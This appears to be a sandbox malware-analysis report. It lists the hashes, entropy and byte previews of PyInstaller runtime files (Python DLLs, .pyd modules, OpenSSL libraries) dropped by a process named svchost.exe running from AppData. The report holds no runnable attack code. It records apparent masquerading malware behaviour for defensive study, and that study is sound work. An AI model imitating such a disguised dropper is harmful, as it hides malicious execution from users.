                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI61562\file.exe.manifest
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libcrypto-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ..dA..dA..dA..m9..pA..6)..fA..6)..nA..6)..nA..6)..nA..?)..oA..dA...A...(...C...(..eA...(m.eA...(..eA..RichdA..................PE..L......_...........!.................H........................................"......."...@.........................0~...h...U!.T.....!.|.............!.......!.X....b..8............................b..@............P!..............................text.............................. ..`.rdata..F&.......(..................@..@.data...4Y.... ....... .............@....idata..h....P!....... .............@..@.00cfg.......p!....... .............@..@.rsrc...|.....!.......!.............@..@.reloc........!.......!.............@..B........................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libffi-7.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libssl-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L......_...........!.........................................................`......h.....@..............................N..............s.................... ...5..P...8...............................@............................................text...7........................... ..`.rdata...g.......h..................@..@.data....;...p...6...Z..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s...........................@..@.reloc..4=... ...>..................@..B................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\pyexpat.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-L..-L..-L..L..-Ls.,M..-Ls.(M..-Ls.)M..-Ls..M..-LT.,M..-L.,M..-L..,L..-LT.%M..-LT.-M..-LT..L..-LT./M..-LRich..-L........PE..L...../`...........!......................................................................@.........................`B..P....B.......p...............v...............=..T............................>..@............................................text............................... ..`.rdata...N.......P..................@..@.data...X....P.......>..............@....rsrc........p.......J..............@..@.reloc........... ...V..............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\python38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j...................%(................................"...y...".....".....".....Rich............PE..L...m./`...........!......#..........#.......#...............................?.......>...@..........................b8......%9.|.....=...............=...... =..e...]8.T...........................P^8.@.............#..............................text.....#.......#................. ..`.rdata.......#.......#.............@..@.data.......P9......89.............@....rsrc.........=......H;.............@..@.reloc...e... =..f...T;.............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.>ua.P&a.P&a.P&h..&m.P&Z.Q'c.P&.c.&`.P&Z.S'c.P&Z.U's.P&Z.T'j.P&..V'`.P&u.Q'c.P&..Q'j.P&a.Q&..P&.U'l.P&.P'`.P&.R'`.P&Richa.P&........................PE..L....^._...........!..............................z.......................................@..........................K...E..............d............................A..T............................B..@............................................text...E........................... ..`.rdata..p...........................@..@.data...H...........................@....gfids..L...........................@..@.rsrc...d...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\select.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2 ..SN..SN..SN..+...SN.S"O..SN.S"K..SN.S"J..SN.S"M..SN.t!O..SN..8O..SN..SO..SN.t!F..SN.t!N..SN.t!...SN.t!L..SN.Rich.SN.........................PE..L...../`...........!.........&...............0......................................j.....@......................... ;..L...l;..x....`...............D.......p.......6..T............................6..@............0...............................text...]........................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\ucrtbase.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..0..0..0..P0..0w..1..0w..1..0w..1..0w..1..0P..1..0...1..0..0...0P..1..0P..1..0P.<0..0P..1..0Rich..0........................PE..L...../`...........!.....F...B......rF.......`.......................................j....@.........................pv..X....v.......................................q..T...........................@r..@............`..4............................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@...!..!..!..Y..!.....!.....!.....!......!..G..!.....!...C..!..!... ......!......!......!..Rich.!..........................PE..L....^._...........!......................................................................@..........................L......dM..........T...........................`E..T............................D..@...............@...lL..@....................text...*........................... ..`.rdata.............................@..@.data................b..............@....gfids..L............t..............@..@.rsrc...T............v..............@..@.reloc........... ...z..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32event.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?&+.{GE.{GE.{GE.r?...GE.@.D.yGE.@.F.zGE.@.@.qGE.@.A.pGE...D.yGE.o!D.yGE..%D.~GE.{GD.(GE...@.zGE...E.zGE...G.zGE.Rich{GE.........................PE..L....^._...........!.....*...(.......*.......@............................................@..........................M..T....N..........\............................I..T...........................HJ..@............@..h............................text....(.......*.................. ..`.rdata..N....@......................@..@.data...H....`.......H..............@....gfids.......p.......J..............@..@.rsrc...\............L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r..r..r..r.....r..,..r..,..r..,..r..,..r...,..r.....r......r..r...s...,..r...,..r...,..r..Rich.r..........................PE..L....^._...........!......................................................................@..........................3..h....3..........T........................:...*..T...........................H+..@............................................text...N........................... ..`.rdata..j...........................@..@.data...X ...`.......P..............@....gfids..L............n..............@..@.rsrc...T............p..............@..@.reloc...:.......<...t..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\Include\pyconfig.h
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI63082\VCRUNTIME140.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ix..-...-...-....|./...$a..&...-.......h..>...h..8...h..1...h..,...hl.,...h..,...Rich-...................PE..L....._.........."!.........................................................@......{.....@A......................................... ...................#...0..x....#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc..x....0......................@..B........................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...%..%..%....%...$..%... ..%...!..%...&..%.<.$..%.$..%..$...%.<.-..%.<.%..%.<....%.<.'..%.Rich..%.........PE..L...../`...........!.....^...f.......].......p.......................................R....@.............................P...0...d...............................H...8...T...............................@............p...............................text....\.......^.................. ..`.rdata...8...p...:...b..............@..@.data...............................@....rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4..g..g..g..xg..gx..f..gX,,g..gx..f..gx..f..gx..f..g_..f..g...f..g..g...g_..f..g_..f..g_..g..g_..f..gRich..g........................PE..L...../`...........!.........N......y........................................P......2^....@......................... ...H...h........0.......................@......x...T...............................@............................................text...Y........................... ..`.rdata..n1.......2..................@..@.data...8.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S<...]...]...]...%o..]..,...]..,...]..,...]..,...]../...]...6...]...6...]..4...]...]...]../...]../...]../...]../...]..Rich.]..................PE..L...../`...........!.........................0......................................6.....@..........................f......Dg..................................l....b..T...........................hb..@............0...............................text............................... ..`.rdata..~N...0...P..................@..@.data.... ...........f..............@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.}c...c...c...j.@.m....../a....../o....../i....../g....../`...w../a...c........../l....../b.....,.b....../b...Richc...................PE..L...../`...........!................w.....................................................@......................... ...P...p........P...............`.......`..D!......T...............................@............................................text...Q........................... ..`.rdata..............................@..@.data........0....... ..............@....rsrc........P.......2..............@..@.reloc..D!...`..."...>..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_hashlib.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
